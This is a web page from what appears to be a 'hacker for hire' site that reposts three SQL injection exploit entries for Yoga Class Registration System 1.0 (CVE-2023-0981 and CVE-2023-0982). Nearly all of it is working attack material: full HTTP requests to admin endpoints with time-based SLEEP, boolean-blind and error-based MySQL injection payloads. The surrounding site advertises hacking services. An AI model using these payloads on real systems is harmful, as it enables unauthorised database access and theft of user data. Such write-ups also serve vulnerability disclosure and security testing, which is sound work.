Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us: Help@mobilehackerforhire.com

Telegram Medium
Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof
Hire a hacker

Yoga Class Registration System 1.0 SQL Injection ≈ Mobile Hacker For Hire

#1 Mobile Hacker For Hire > Blog > Uncategorized > Yoga Class Registration System 1.0 SQL Injection ≈ Mobile Hacker For Hire

Table of Contents

# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: [CVE-2023-0982]
# Tested on: Windows 11

# Payload

GET /php-ycrs/admin/registrations/update_status.php?id=2’+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)–+yLjU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer:
http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

##Payload

‘+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)–+yLjU

the back-end DBMS is MySQL

web application technology: PHP 8.0.25, Apache 2.4.54

back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0981 )
# Tested on: Windows 11

“`
POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Origin: http://localhost
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=classes
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=96′
“`

# Payload

Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause (subquery –
comment)
Payload: id=96′ AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE
(SELECT 8487 UNION SELECT 3172) END))– –

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: id=96′ AND (SELECT 4409 FROM(SELECT
COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– NiQL

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=96′ AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)– wkzQ

# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0982 )
# Tested on: Windows 11

##Payload

POST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=—————————408548517113152447833471217322
Content-Length: 286
Origin: http://localhost
Connection: close
Referer:
http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

—————————–408548517113152447833471217322
Content-Disposition: form-data; name=”id”

2′
—————————–408548517113152447833471217322
Content-Disposition: form-data; name=”status”

1
—————————–408548517113152447833471217322–

##Payload
‘+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)–+yLjU

the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Post

Uncategorized
Catpops Technobiz CMS 4.0 Cross Site Scripting
Posted on
Uncategorized
ABUS Security Camera LFI, RCE and SSH Root
Posted on
Uncategorized
Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666
Posted on

©2022. Mobile Hacker For Hire. All Rights Reserved.

help@mobilehackerforhire.com

error: Content is protected !!